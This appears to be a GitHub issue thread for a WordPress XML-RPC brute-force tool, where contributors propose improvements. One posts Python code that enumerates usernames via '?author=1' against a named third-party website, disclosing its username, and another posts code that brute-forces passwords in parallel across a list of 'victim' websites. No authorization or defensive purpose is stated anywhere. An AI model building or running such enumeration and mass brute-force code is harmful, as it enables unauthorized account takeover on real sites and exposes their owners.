### ISSUE TITLE
Do you still work on this project ? I have one improvement

### ISSUE THREAD

**Issue by ruz0ne** [galehrizky/wp-brute-xmlrpc#1]
Hey very nice and interesting project. Do you still work on this project ? If yes i have one improvement for the user enumeration wich you can maybe add in your Code.

Thanks

**Comment by galehrizky** [comment]
Thanks, what improvement do you want to add ?

**Comment by ruz0ne** [comment]
lets take for example this website "http://odaibertmeorienta.com" its not possible on this website to get the username with the method in your code "http://odaibertmeorienta.com/wp-json/wp/v2/users/"

but its possible to get the username with this method "?author=1" so if you go now on this site "http://odaibertmeorienta.com/?author=1" you will get the username in the title.. in this case its the username "daibert"

so this is another check to try to get the username if the try with "/wp-json/wp/v2/users/" doesnt work

**Comment by ruz0ne** [comment]
`import re
import requests

h = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"}

r = requests.get('http://odaibertmeorienta.com/?author=1', headers = h)
al = r.text

pattern_string = re.escape('author/') + "(.*?)" + re.escape('/')
titleRE = re.compile(pattern_string)
title = titleRE.search(al).group(1)
print title
`

ive made a little example it will print the username "daibert" in this example

**Comment by galehrizky** [comment]
feel free to submit a pull request.

**Comment by ruz0ne** [comment]
ok i will do it

could you add the feature to check multiple websites at the same moment ?? at the moment this script just checks one website at once ??

**Comment by galehrizky** [comment]
this tool can already do multiple website add in list.txt or your list that contains victim's website, this tool also adds multithread, and generates user at the same time membrute all available users.

**Comment by ruz0ne** [comment]
yes i  know  but it does that all only to one website at a time. is it not possible to create multiple instances and do all of that to multiple websites at the same time ?

for example:

at the moment it will check all passwords against "website1" and only if the password checks from "website1" are finished it will start to check "website2" 

it would be a lot faster if it check all passwords at the same time against "website1" and "website2" would that be possible ?

**Comment by apaajalahx** [comment]
@ruz0ne 

you can add this code for feature multiple check in 1 time

```
def main():
 	try:
 		parser = argparse.ArgumentParser(description='Multiple Brute Force XMLRPC [Wordpress]')
 		parser.add_argument("--list", help="List website victim", required=True)
 		args = parser.parse_args()
 		try:
 			with ThreadPoolExecutor(max_workers=5) as execurl:
 				with open(args.list, "r") as victim:
 					print(colored("[+] Start Brute Force on {}".format(local_time()), "yellow"))
 					for sites in victim:
 						url = sites.rstrip()
 						execurl.submit(brute_url,url)
 				print(colored("[+] End Brute Force on {}".format(local_time()), "yellow"))
 		except IOError as e:
 			print("[{}][!] List website victim not exist !".format(local_time()))
 			sys.exit()
 	except KeyboardInterrupt as e:
 		print("[{}][!] Exit Program".format(local_time()))
 		sys.exit()
```
